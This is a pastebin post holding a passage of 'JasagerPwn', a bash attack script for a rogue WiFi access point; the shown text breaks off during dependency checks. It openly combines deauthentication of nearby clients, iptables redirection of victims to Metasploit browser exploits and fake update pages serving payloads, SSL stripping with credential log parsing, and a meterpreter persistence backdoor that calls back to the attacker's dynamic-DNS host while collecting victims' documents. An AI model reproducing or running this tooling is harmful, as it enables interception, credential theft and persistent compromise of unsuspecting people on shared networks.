pastebin - collaborative debugging tool
kpaste.net RSS


jasagerPwn-1.1-r44
Posted by Anonymous on Sat 7th May 2011 02:14
raw | new post

  1. jasagerPwn-1.1-r44
  2.  
  3. #!/bin/bash
  4.  
  5. #leg3nd's JasagerPwn Attack - v1.1 -  rev44
  6. #ATTACKS - browserPwn - Redirect LAN to Metasloits auxillary module browser autoPwn for sessions
  7. #        - FakeUpdate - Redirect LAN to fake update page with metasploit payload download.
  8. #        - Java Applet - Redirects LAN to a java applet with meterpreter payload. via SET.
  9. #        - Sniffer - Justs picks up traffic with no ARP posioning, and perfect ssl stripping
  10. #        - DeAuth - Deauths nearby clients from their APs and try to make them join yours
  11. #
  12. #Allows control of transparency of all attacks via built in bash menu.
  13. # Reqires: Aircrack-ng suite (w/ airdrop-ng), Metasploit Framework, Social Engineering Toolkit, Dsniff suite
  14. #          Apache2, working ruby and python, Injection, DHCP3, SSLstrip, PHP5, Macchanger.
  15. #
  16. # Created for and tested with an RTL8187 monitor mode card, and a open-WRT Fon+ (Pineapple).
  17. # For More Information refer to INSTALL_HOWTO, usage information -h / -?
  18.  
  19. #SCRIPT CONFIGURATION BELOW - ADJUST TO YOUR WIFI CONFIGURATION
  20. IFACE="usb0" #Connection to the internet (gateway), EG wlan0,eth1,usb0,ppp0,etc
  21. WiFiMODE="0" #Use WiFi For Internet Gateway (Will create a DeAuth Rule so you dont own yourself) EG 0,1
  22. fonIP="192.168.10.2"  #Fon router Iface IP, this is HARDCODED to 192.168.10.0 subnet.
  23. FONIFACE="eth0" #Interface facing the Jasager router
  24. WIFACE="wlan0" #Wireless Interface, EG wlan0,ath0,wifi0
  25. MIFACE="mon0" #Monitor Interface for Attacks
  26. #Macchanger, ONLY FOR ATTACK INTERFACES
  27. macMode="set" #Mac spoofing mode - set / random  (case sensitive)
  28. fakeMac="00:e0:f7:99:e1:30"  # 00:e0:f7:99:e1:30 (Cisco Systems, Inc.) lawl
  29. ourAPmac="00:12:CF:A4:92:B1"  #Pineapple MAC so we dont DeAuth Ourselves!
  30. msfpath="/pentest/exploits/framework3"  #Metasploit Location (if not BT4, use msf3 directory)
  31. SETpath="/pentest/exploits/SET" #Social Engineering Toolkit Location
  32. DomainName="Networking.com"  #Domain name for DHCP configuration.
  33. ######################################################################################################################
  34. #Funcion can be used to customize post-exploit meterpreter script. this steals documents and adds a backdoor.
  35. #This slightly modified persistence script supports D-DNS tracking (like dyndns.org or no-ip)
  36. autoMetScript="0"  #Allows you to automaticlly run a meterpreter persistence script on the victim.
  37. Pport="31337" # persistence backdoor port
  38. PersIP="Your.dyndns.com" # Your dyndns or no-ip for backdoors
  39. pwd=`echo $PWD`
  40. function metScript(){
  41. if [ -e "$SETpath/src/program_junk/multi_meter.file" ] ; then rm "$SETpath/src/program_junk/multi_meter.file" ; fi
  42. # EDIT METERPRETER SCRIPT BELOW THIS
  43. echo -e "persistence_dns -r $PersIP -p $Pport -i 60 -X -A
  44. file_collector -d c:\\Users\\ -r -f *.doc|*.pdf|*.xls|*.docx| -o /tmp/files
  45. file_collector -i /tmp/files -l $pwd/collected__$NOW
  46. " > $SETpath/src/program_junk/multi_meter.file
  47. }
  48. ####END SCRIPT CONFIG######
  49.  
  50.  
  51. #====================================================================================================================
  52. #####################################################################################################################
  53. while getopts "a:p:i:w:m:s:d:h:?uU" OPTIONS; do
  54.    case ${OPTIONS} in
  55.       a ) autoMetScript=$OPTARG ;;
  56.       p ) Pport=$OPTARG ;;
  57.       d ) WiFiMODE=$OPTARG ;;
  58.       i ) IFACE=$OPTARG ;;
  59.       w ) WIFACE=$OPTARG ;;
  60.       h ) help ;;
  61.       m ) macMode=$OPTARG ;;
  62.       s ) fakeMac=$OPTARG ;;
  63.       u ) update ;;
  64.       U ) Fupdate ;;
  65.       ? ) help ;;
  66.       * ) echo -e "\e[01;31m[!]\e[00m Error: Unknown Switch Option" 1>&2 ;; # Default
  67.    esac
  68. done
  69. #SCRIPT VARIABLES - DO NOT TOUCH - HARDCODED AND SENSITIVE
  70. #REQUIRED CHECKS FOR FUNCTIONALITY
  71. version="1.1"
  72. rev="44"
  73. Fwww="/var/www/fakeupdate"
  74. Jwww="/var/www/javapwn"
  75. Gwww="/var/www/google"
  76. gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'`
  77. WIFcheck=`ifconfig | grep $WIFACE | awk '{ print $1 }'`
  78. IFcheck=`ifconfig | grep $IFACE | awk '{ print $1 }'`
  79. NOW=$(date +"%b-%d_%H:%m:%S")
  80. sslport="11000"
  81. SPWD=`echo $PWD`
  82. javasite="1"
  83. sniffing="0"
  84. wasSniffing="0"
  85. fakeupdate="0"
  86. browserpwn="0"
  87. javaATK="0"
  88. z="1"
  89. moncheck=`ifconfig | grep $MIFACE | awk '{print $1}' | cut -b 4`
  90. ATKcheck=`ifconfig | grep $MIFACE | awk '{print $1}' | cut -b 4`
  91. ourIP=`ifconfig $FONIFACE | awk '/inet addr/ {split ($2,A,":"); print A[2]}'`
  92. wifiMAC=`ifconfig $IFACE | grep "HWaddr" | awk '{print $5}' | tr "[a-z]" "[A-Z]"`
  93. googleRev=`wget -qO- "http://jasager-pwn.googlecode.com/svn/trunk/" | grep "<title>jasager-pwn - Revision" |  awk -F " " '{split ($4,A,":"); print A[1]}'`
  94.  
  95. trap 'cleanup' 2 # Interrupt - "Ctrl + C"
  96. #-----------------------------------------------------------------------
  97. function help() { #help
  98.    echo "
  99. (C)opyright 2011 leg3nd @ www.info-s3curity.com
  100.  
  101. Usage: bash jasagerPwn -i [interface] -m [random/set] -s [00:11:22:33:44:55]
  102.                        -p [31337]     -a [0/1]        -w [interface]
  103.  
  104. Options:
  105.   -a [0/1]             :  Auto-Run Meterpreter Script, Customize in script. Current = $autoMetScript
  106.   -p [31337]           :  Auto-Run Scripts persistence Port. Current = $Pport
  107.    -i [interface]       :  Internet Gateway Interface. Current = $IFACE
  108.    -w [interface]       :  WiFi Card Interface. Current = $WIFACE
  109.    -d [0/1]             :  WiFi Gateway Mode - Adds DeAuth Rule For Yourself = $WiFiMODE
  110.    -m [random/set]      :  Change the Attack Interfaces MAC Address. Current = $macMode
  111.    -s [MAC]             :  Use this MAC Address. Requires -m. Current = $fakeMac
  112.    -u                   :  Update script and its resources from Google Code.
  113.    -U                   :  Update script, SET, and Metasploit.
  114.    -? / -h              :  Help Screen and Switches. More Information In top of script.
  115.  
  116. For Installation, setup, and more information, please reference the INSTALL file or
  117. http://www.hak5.org/forums/index.php?showtopic=19955
  118.  
  119.  
  120. "
  121.    exit 1
  122. }
  123. function IPTABLES(){
  124. xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables"   -e "iptables --flush"
  125. xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables"   -e "iptables --table nat --flush"
  126. xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables"   -e "iptables --delete-chain"
  127. xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables"   -e "iptables --table nat --delete-chain"
  128. xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables"   -e "iptables -X"
  129. xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables"   -e "iptables -F"
  130.  
  131. iptables -P FORWARD ACCEPT
  132. iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
  133. iptables -A FORWARD -i $FONIFACE -o $IFACE -m state --state NEW -j ACCEPT
  134. if [ $gatewayIP ]; then iptables -t nat -A PREROUTING --in-interface $FONIFACE -p udp --dport 53 -j DNAT --to $gatewayIP ; fi
  135. iptables --append FORWARD --in-interface $FONIFACE -j ACCEPT
  136. iptables --table nat --append POSTROUTING --out-interface $IFACE -j MASQUERADE
  137.  
  138. #check for sslstrip
  139. #if [ $sniffing -eq 1 ]; then
  140. #iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports $sslport
  141. #iptables --table nat --append PREROUTING --proto tcp --destination-port 80 --jump REDIRECT --to-port $sslport
  142. #fi
  143. ifconfig $FONIFACE $fonIP
  144. }
  145.  
  146. function ipTableRedirect {
  147. xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables"   -e "iptables --flush"
  148. xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables"   -e "iptables --table nat --flush"
  149. xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables"   -e "iptables --delete-chain"
  150. xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables"   -e "iptables --table nat --delete-chain"
  151. xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables"   -e "iptables -X"
  152. xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Clearing IPTables"   -e "iptables -F"
  153. sleep 1
  154.  
  155. if [ $sniffing -eq "1" ] ; then
  156. #iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports $sslport
  157. #iptables --table nat --append PREROUTING --proto tcp --destination-port 80 --jump REDIRECT --to-port 80
  158. xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing Tail" -e "kill $TAILPID" &
  159. xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing SSLStrip" -e "killall -9 sslstrip" &
  160. wasSniffing=$sniffing
  161. sniffing="0"
  162. fi
  163.  
  164. iptables -P FORWARD ACCEPT
  165. iptables --append FORWARD --in-interface $FONIFACE -j ACCEPT
  166. iptables --table nat --append POSTROUTING --out-interface $IFACE -j MASQUERADE
  167. iptables -t nat -A PREROUTING --in-interface $FONIFACE -p udp -j DNAT --to $fonIP
  168.  
  169. iptables --table nat --append PREROUTING --in-interface $FONIFACE --proto tcp --jump DNAT --to $fonIP
  170. iptables --table nat --append PREROUTING --in-interface $FONIFACE --jump REDIRECT
  171. iptables --table nat --append PREROUTING --in-interface $FONIFACE
  172.  
  173. #redirect all traffic to us
  174. #iptables -t nat -A PREROUTING -i $FONIFACE -j REDIRECT
  175. ifconfig $FONIFACE $fonIP
  176.  
  177. }
  178.  
  179. #Script update via google code
  180. function update(){
  181. if [ ! $googleRev ]; then
  182.    echo -e "\e[01;31m[!]\e[00m ERROR: Couldn't resolve revision from google.."
  183.    exit 1
  184. elif [ $googleRev -lt $rev ]; then
  185.    echo -e "\e[01;31m[!]\e[00m ERROR: Your revision number is too new.."
  186.    exit 1
  187. elif [ $googleRev -gt $rev ]; then
  188.   echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version rev$rev - Updating to rev$googleRev..."
  189.   wget -q -N "http://jasager-pwn.googlecode.com/svn/trunk/jasagerPwn"
  190.   wget -q -P "./src/" -N "http://jasager-pwn.googlecode.com/svn/trunk/src/persistence_dns.rb"
  191.   wget -q -P "./src/" -N "http://jasager-pwn.googlecode.com/svn/trunk/src/deauth.sh"
  192.   #FakeUpdate
  193.   for Fitems in "favicon.ico" "index.php" "style.css" "sbd.exe" "vnchooks.dll" "wkv-x64.exe" "wkv-x86.exe" "winvnc.exe" "vnc.reg" ; do
  194.     if [ -e "./src/wwwFakeupdate/" ] ; then wget -q -N -P "./www/" "http://jasager-pwn.googlecode.com/svn/trunk/wwwFakeupdate/$Fitems" ; fi
  195.     if [ -e "$Fwww/" ] ; then wget -q -N -P "$Fwww/" "http://jasager-pwn.googlecode.com/svn/trunk/src/wwwFakeupdate/$Fitems" ; fi
  196.   done
  197.   #JavaPwn
  198.   for Jitems in "index.template" "index.template.plain" ; do
  199.     if [ -e "./src/wwwJava/" ] ; then wget -q -N -P "./src/wwwJava/" "http://jasager-pwn.googlecode.com/svn/trunk/wwwJava/$Jitems" ; fi
  200.     if [ -e "$Jwww/" ] ; then wget -q -N -P "$Jwww/" "http://jasager-pwn.googlecode.com/svn/trunk/src/wwwJava/$Jitems" ; fi
  201.   done
  202.         for Jitems2 in "global.js" "index.jsp" "oo_conf_en-US.js"  "oo_engine.js"  "popUp.js"  "print.css"  "s_code_remote.js"  "screen.css" ; do
  203.             if [ -e "./src/wwwJava/temp/" ] ; then wget -q -N -P "./src/wwwJava" "http://jasager-pwn.googlecode.com/svn/trunk/wwwJava/temp/$Jitems2" ; fi
  204.             if [ -e "$Jwww/temp/" ] ; then wget -q -N -P "$Jwww/temp/" "http://jasager-pwn.googlecode.com/svn/trunk/src/wwwJava/temp/$Jitems2" ; fi
  205.         done
  206.   #Google
  207.   for Gitems in "index.template" ; do
  208.     if [ -e "./src/wwwGoogle/" ] ; then wget -q -N -P "./src/wwwGoogle/" "http://jasager-pwn.googlecode.com/svn/trunk/wwwGoogle/$Gitems" ; fi
  209.     if [ -e "$Fwww/" ] ; then wget -q -N -P "$Fwww/" "http://jasager-pwn.googlecode.com/svn/trunk/src/wwwGoogle/$Gitems" ; fi
  210.   done
  211.         for Gitems2 in "favicon.ico" "gzip.html" "js1.js" ; do
  212.             if [ -e "./src/wwwGoogle/temp/" ] ; then wget -q -N -P "./wwwGoogle/temp/" "http://jasager-pwn.googlecode.com/svn/trunk/wwwGoogle/temp/$Gitems2" ; fi
  213.             if [ -e "$Gwww/temp/" ] ; then wget -q -N -P "$Jwww/temp/" "http://jasager-pwn.googlecode.com/svn/trunk/src/wwwGoogle/temp/$Gitems2" ; fi
  214.         done
  215. elif [ $googleRev -eq $rev ]; then
  216.   echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version rev$rev - Your Already Up To Date!"
  217. fi
  218. echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version rev$googleRev - All Done!"
  219. exit 1
  220. }
  221.  
  222. #Full update including MSF/SET
  223. function Fupdate(){
  224. echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version rev$googleRev - Updating Metasploit.."
  225. xterm -fg green -bg black -geometry 75x20+0+0 -T "JasagerPwn v$version rev$googleRev - Metaploit Update"   -e "cd $msfpath && ./msfupdate"
  226. echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version rev$googleRev - Updating SET.."
  227. xterm -fg green -bg black -geometry 75x20-0+0 -T "JasagerPwn v$version rev$googleRev - SET Update"   -e "cd $SETpath && python set-update"
  228. if [ ! $googleRev ]; then
  229.    echo -e "\e[01;31m[!]\e[00m ERROR: Couldn't resolve revision from google.."
  230.    exit 1
  231. elif [ $googleRev -lt $rev ]; then
  232.    echo -e "\e[01;31m[!]\e[00m ERROR: Your revision number is too new.."
  233.    exit 1
  234. elif [ $googleRev -gt $rev ]; then
  235.   echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version rev$rev - Updating to rev$googleRev..."
  236.   wget -q -N "http://jasager-pwn.googlecode.com/svn/trunk/jasagerPwn"
  237.   wget -q -P "./src/" -N "http://jasager-pwn.googlecode.com/svn/trunk/src/persistence_dns.rb"
  238.   wget -q -P "./src/" -N "http://jasager-pwn.googlecode.com/svn/trunk/src/deauth.sh"
  239.   #FakeUpdate
  240.   for Fitems in "favicon.ico" "index.php" "style.css" "sbd.exe" "vnchooks.dll" "wkv-x64.exe" "wkv-x86.exe" "winvnc.exe" "vnc.reg" ; do
  241.     if [ -e "./src/wwwFakeupdate/" ] ; then wget -q -N -P "./www/" "http://jasager-pwn.googlecode.com/svn/trunk/wwwFakeupdate/$Fitems" ; fi
  242.     if [ -e "$Fwww/" ] ; then wget -q -N -P "$Fwww/" "http://jasager-pwn.googlecode.com/svn/trunk/src/wwwFakeupdate/$Fitems" ; fi
  243.   done
  244.   #JavaPwn
  245.   for Jitems in "index.template" "index.template.plain" ; do
  246.     if [ -e "./src/wwwJava/" ] ; then wget -q -N -P "./src/wwwJava/" "http://jasager-pwn.googlecode.com/svn/trunk/wwwJava/$Jitems" ; fi
  247.     if [ -e "$Jwww/" ] ; then wget -q -N -P "$Jwww/" "http://jasager-pwn.googlecode.com/svn/trunk/src/wwwJava/$Jitems" ; fi
  248.   done
  249.         for Jitems2 in "global.js" "index.jsp" "oo_conf_en-US.js"  "oo_engine.js"  "popUp.js"  "print.css"  "s_code_remote.js"  "screen.css" ; do
  250.             if [ -e "./src/wwwJava/temp/" ] ; then wget -q -N -P "./src/wwwJava" "http://jasager-pwn.googlecode.com/svn/trunk/wwwJava/temp/$Jitems2" ; fi
  251.             if [ -e "$Jwww/temp/" ] ; then wget -q -N -P "$Jwww/temp/" "http://jasager-pwn.googlecode.com/svn/trunk/src/wwwJava/temp/$Jitems2" ; fi
  252.         done
  253.   #Google
  254.   for Gitems in "index.template" ; do
  255.     if [ -e "./src/wwwGoogle/" ] ; then wget -q -N -P "./src/wwwGoogle/" "http://jasager-pwn.googlecode.com/svn/trunk/wwwGoogle/$Gitems" ; fi
  256.     if [ -e "$Fwww/" ] ; then wget -q -N -P "$Fwww/" "http://jasager-pwn.googlecode.com/svn/trunk/src/wwwGoogle/$Gitems" ; fi
  257.   done
  258.         for Gitems2 in "favicon.ico" "gzip.html" "js1.js" ; do
  259.             if [ -e "./src/wwwGoogle/temp/" ] ; then wget -q -N -P "./wwwGoogle/temp/" "http://jasager-pwn.googlecode.com/svn/trunk/wwwGoogle/temp/$Gitems2" ; fi
  260.             if [ -e "$Gwww/temp/" ] ; then wget -q -N -P "$Jwww/temp/" "http://jasager-pwn.googlecode.com/svn/trunk/src/wwwGoogle/temp/$Gitems2" ; fi
  261.         done
  262. elif [ $googleRev -eq $rev ]; then
  263.   echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version rev$rev - Your Already Up To Date!"
  264. fi
  265. echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version rev$googleRev - All Done!"
  266. exit 1
  267. }
  268.  
  269. #Parse that messy SSLstrip.log
  270. SSLparse(){
  271. if [ -e "/$PWD/sslstrip.log" ]; then
  272. LOGPATH="/$PWD/sslstrip.log"
  273. DEFS="cred-collector/definitions.sslstrip"
  274. #
  275. NUMLINES=$(cat "$DEFS" | wc -l)
  276. i=1
  277. while [ $i -le $NUMLINES ]; do
  278.   VAL1=$(awk -v k=$i 'FNR == k {print $1}' "$DEFS")
  279.   VAL2=$(awk -v k=$i 'FNR == k {print $2}' "$DEFS")
  280.   VAL3=$(awk -v k=$i 'FNR == k {print $3}' "$DEFS")
  281.   VAL4=$(awk -v k=$i 'FNR == k {print $4}' "$DEFS")
  282.   GREPSTR="$(grep -a $VAL2 "$LOGPATH" | grep -a $VAL3 | grep -a $VAL4)"
  283.   if [ "$GREPSTR" ]; then
  284.     echo -n "$VAL1" "- " >> /$PWD/cred-collector/ssl-collection.log
  285.     echo "$GREPSTR" | \
  286.     sed -e 's/.*'$VAL3'=/'$VAL3'=/' -e 's/&/ /' -e 's/&.*//' >> /$PWD/cred-collector/ssl-collection.log
  287.   fi
  288.   i=$[$i+1]
  289. done
  290. fi
  291. }
  292. #function for fluid use of both SET templates
  293. function JavaSite(){
  294. GoogCheck=`cat $SETpath/config/set_config | grep "APACHE_DIRECTORY=/var/www/javapwn"`
  295. #1 = google   2  = java required
  296. if [ "$javasite" -eq "1" ] && [ "$GoogCheck" = "APACHE_DIRECTORY=/var/www/javapwn" ]; then
  297.    sed ''${SETapacheDIR}'s!APACHE_DIRECTORY=/var/www/javapwn!APACHE_DIRECTORY=/var/www/google!' $SETpath/config/set_config > $SETpath/config/set_configJ
  298.    sleep 1
  299.    mv $SETpath/config/set_configJ $SETpath/config/set_config
  300. elif [ "$javasite" -eq "2" ]; then
  301.    sed ''${SETapacheDIR}'s!APACHE_DIRECTORY=/var/www/google!APACHE_DIRECTORY=/var/www/javapwn!' $SETpath/config/set_config > $SETpath/config/set_configG
  302.    sleep 1
  303.    mv $SETpath/config/set_configG $SETpath/config/set_config
  304. fi
  305. }
  306.  
  307. function sslstrip(){
  308. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports $sslport
  309. xterm -geometry 75x3+1-25 -bg black -fg green -e "sslstrip -l $sslport && sleep 3" &
  310. if [ ! -e sslstrip.log ]; then touch sslstrip.log; fi
  311. xterm -geometry 75x24+464+65 -bg black -fg green -T "SSLStrip Sniffing" -e "tail -f sslstrip.log" &
  312. TAILPID=`echo $!`
  313. sniffing="1"
  314. wasSniffing=$sniffing
  315. }
  316.  
  317. function cleanup() {
  318.    echo
  319.    echo -e "\e[01;32m[>]\e[00m Cleaning up..."
  320.    if [ $z = 1 ]; then
  321.       SSLparse && sleep 1
  322.       if test -e /tmp/dhcpd.conf;       then rm /tmp/dhcpd.conf; fi
  323.       xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing DriftNET" -e "killall -9 driftnet" &
  324.       xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing SSLStrip" -e "killall -9 sslstrip" &
  325.       xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing Apache" -e "/etc/init.d/apache2 stop" &
  326.       xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing Tail" -e "kill $DNSID" &
  327.       xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing Dsniff" -e "kill $dsniffID" &
  328.       xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing Tail" -e "kill $TAILPID" &
  329.       #xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing SSL Parsing" -e "kill $parseID" &
  330.       xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing DHCP" -e "kill $messageID" &
  331.       xterm -geometry 75x12+464+288 -bg black -fg green -T "JasagerPwn v$version - Killing DeAuth Attacks" -e "kill $AIRDROPID && kill $AIRDUMPID && kill $airID && kill $ipID && kill $dnsID2 && kill $parseID" &
  332.       #xterm -geometry 75x7+10+330 -T "[leg3nd-BrowserPwn] v$version - Killing DNSSpoof" -e "killall -9 dnsspoof" &
  333.       xterm -geometry 75x7+10+330 -T "[JasagerPwn-BrowserPwn] v$version - Killing DHCP3" -e "/etc/init.d/dhcp3-server stop"
  334.       xterm -geometry 75x7+10+330 -T "[JasagerPwn-BrowserPwn] v$version - Killing URLSnarf" -e "killall -9 urlsnarf"
  335.       xterm -geometry 75x7+10+330 -T "[JasagerPwn-BrowserPwn] v$version - Killing URLSnarf" -e "killall -9 dsniff"
  336.       xterm -geometry 75x8+100+0 -T "v$version - Killing 'IPtables'" -e "iptables -F" &
  337.       xterm -geometry 75x8+100+0 -T "v$version - Killing 'IPtables'" -e "iptables -X" &
  338.       #Clean up our cfgs
  339.       if test -e dsniff*;               then rm dsniff*; fi
  340.       if [ -e "/$PWD/dsniff.services" ]; then rm "/$PWD/dsniff.services" ; fi
  341.       if [ -e *.png ]; then rm *.png ; fi
  342.       if [ -d "$SETpath/src/html/templates/java/temp/" ]; then rm -rf $SETpath/src/html/templates/java/temp/ ; fi
  343.       if [ -d "$SETpath/src/html/templates/google/temp/" ]; then rm -rf $SETpath/src/html/templates/google/temp/ ; fi
  344.       if [ -e "$SETpath/src/html/templates/java/index.template" ] && [ -e "$SETpath/src/html/templates/java/index.template.ORIGINAL" ]; then
  345.         mv "$SETpath/src/html/templates/java/index.template.ORIGINAL" "$SETpath/src/html/templates/java/index.template"
  346.       fi
  347.       APACHEDIR=`cat $SETpath/config/set_config | grep "/var/www/javapwn"`
  348.       if [ -e "$SETpath/src/html/templates/google/index.template.ORIGINAL" ] ; then mv $SETpath/src/html/templates/google/index.template.ORIGINAL $SETpath/src/html/templates/google/index.template ; fi
  349.       if [ -e "$SETpath/src/html/templates/java/index.template.ORIGINAL" ] ; then mv $SETpath/src/html/templates/java/index.template.ORIGINAL $SETpath/src/html/templates/java/index.template ; fi
  350.       if [ -e "$SETpath/config/set_config.ORIGINAL" ] ; then mv $SETpath/config/set_config.ORIGINAL $SETpath/config/set_config ; fi
  351.       if [ -e "/etc/dhcp3/dhcpd.conf" ] && [  -e "/etc/dhcp3/dhcpd.conf.ORIGINAL" ] ; then rm /etc/dhcp3/dhcpd.conf && mv /etc/dhcp3/dhcpd.conf.ORIGINAL /etc/dhcp3/dhcpd.conf ; fi
  352.       if [ -e "/etc/resolv.conf" ] && [  -e "/etc/resolv.conf.ORIGINAL" ] ; then rm /etc/resolv.conf && mv /etc/resolv.conf.ORIGINAL /etc/resolv.conf ; fi
  353.       if test -e /tmp/auto-java2; then rm /tmp/auto-java2; fi
  354.       if test -e sslstrip.log;          then mv sslstrip.log /$PWD/cred-collector/$NOW-sslstrip.log; fi
  355.       xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing Self" -e "killall -9 jasagerPwn" &
  356.    fi
  357.    echo -e "\e[01;36m[~]\e[00m Exiting with elegance.."
  358.    exit 0
  359. }
  360.  
  361. #xterm -geometry 75x8+100+0 -e "ifconfig $WIFACE up && sleep 2"
  362. ifconfig $WIFACE up && sleep 1
  363. gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'`
  364. WIFcheck=`ifconfig | grep $WIFACE | awk '{ print $1 }'`
  365. IFcheck=`ifconfig | grep $IFACE | awk '{ print $1 }'`
  366.  
  367. ifconfig $FONIFACE $fonIP
  368. #xterm -geometry 0x0+0+0 -e "while true ; do ifconfig $FONIFACE $fonIP && sleep 10 ; done" &
  369. #make sure our IP doesnt get screwy from any dhcp..
  370. while true ; do ifconfig $FONIFACE $fonIP && sleep 10 ; done &
  371. ipID=`echo $!`
  372. gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'`
  373. #check for required interfaces
  374. if [ "$WIFcheck" != "$WIFACE" ]; then
  375. echo -e "\e[01;31m[!]\e[00m FATAL: Cannot Locate $WIFACE..." && exit 0
  376. fi
  377. if [ "$IFcheck" != "$IFACE" ]; then
  378. echo -e "\e[01;31m[!]\e[00m FATAL: Cannot Locate $IFACE..." && exit 0
  379. fi
  380.  
  381. #-----------------------------------------------------------------------
  382. clear
  383. echo
  384. echo
  385. echo '                      __------__'
  386. echo '                    /~          ~\'
  387. echo '                   |    //^\//^\|            Lets get this show on the road!!'
  388. echo "                 /~~\  ||  o| |o|:~\          #! JasagerPwn MultiAttack v$version"
  389. echo '                | |6   ||___|_|_||:|   /      By leg3nd @ info-s3curity.com'
  390. echo "                 \__.  /      o  \/   /                    rev$rev"
  391. echo '                  |   (       O   )           [!] Use At your Own Risk [!]'
  392. echo '         /~~~~\    `\  \         /'
  393. echo '        | |~~\ |     )  ~------~`\'
  394. echo '       / |  | |   /     ____ /~~~)\'
  395. echo '      (_/   | | |     /.    |    ( |'
  396. echo '             | | |     \    /   __)/ \'
  397. echo '             \  \ \      \/    /- \   `\'
  398. echo '               \  \|\        /   | |\___|'
  399. echo '                 \ |  \____/     | |'
  400. echo '                 /^~>  \        _/ <'
  401. echo '                |  |         \       \'
  402. echo '                |  | \        \        \'
  403. echo '                -^-\  \       |        )'
  404. echo '                     `\_______/^\______/'
  405.  
  406. echo
  407. echo
  408. echo -e "\e[01;32m[>]\e[00m Stopping services and programs..."
  409.  
  410. #xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing 'Stopping airmon-ng Interfaces'"   -e "airmon-ng stop $MIFACE"
  411. xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing 'DHCP3 Service'" -e "/etc/init.d/dhcp3-server stop"
  412. xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing Sniffing Apps" -e "killall -9 dhcpd3 airbase-ng ettercap sslstrip driftnet urlsnarf"
  413. xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing DNS Spoof" -e "killall -9 dnsspoof"
  414. xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing WICD" -e "killall -9 wicd"
  415. xterm -geometry 75x8+100+0 -T "JasagerPwn v$version - Killing WICD" -e "/etc/init.d/wicd stop" &
  416. sleep 1
  417.  
  418. echo -e "\e[01;32m[>]\e[00m Checking Environment..."
  419. #test for injection - too glitchy so just got rid of it..
  420. #injection=`aireplay-ng --test $MIFACE -i $MIFACE | sed -n -e ''3'p' | awk '{ print $2, $3, $4 }' | cut -b 1-20`
  421. #if [ "$injection" != "Injection is working" ]; then echo -e "\e[01;31m[!]\e[00m FATAL: $MIFACE Packet Injection Failed.. Try again, or Re-plug it in." && cleanup ; fi
  422.  
  423. #Check for root
  424. if [ "$(id -u)" != "0" ]; then echo -e "\e[01;31m[!]\e[00m FATAL: Not Root.." && cleanup ; fi
  425.  
  426. # Check for dependencies, if not install them
  427. #Dependencies checks
  428. dhcp3check=`dpkg -l | grep dhcp3-server | awk '{print $2}' | head -n 1`
  429. apache2check=`dpkg -l | grep apache2 | awk '{print $2}' | head -n 1`
  430. apache2phpcheck=`dpkg -l | grep "libapache2-mod-php5" | awk '{print $2}' | head -n 1`
  431. dsniffcheck=`dpkg -l | grep dsniff | awk '{print $2}' | head -n 1`
  432. php5check=`dpkg -l | grep php5 | awk '{print $2}' | head -n 1`
  433. macchangerCheck=`dpkg -l | grep macchanger | awk '{print $2}' | head -n 1`
  434. aircrackCheck=`dpkg -l | grep aircrack | awk '{print $2}' | head -n 1`
  435. sleep 1
  436. if [ ! $dhcp3check ] || [ ! $apache2check ] || [ ! $apache2phpcheck ] || [ ! $dsniffcheck ] || [ ! $php5check ] || [ ! $macchangerCheck ] || [ ! $aircrackCheck ] || [ ! -e "/usr/bin/airdrop-ng" ] || [ ! -e $SETpath/src/payloadgen/pefile.py ]; then
  437.   echo && echo -e "\e[01;31m[!]\e[00m Some dependencies were not found.. We will try to install them now..." && echo
  438. elif [ ! -e "/usr/local/bin/sslstrip" ] && [ ! -e "/usr/bin/sslstrip" ]; then
  439.   echo && echo -e "\e[01;31m[!]\e[00m Some dependencies were not found.. We will try to install them now..." && echo
  440. fi
  441. # dhcp3-server check
  442. if [ ! $dhcp3check ]; then
  443.   echo -e "\e[01;31m[!]\e[00m No dhcp3-server was detected... Installing.."
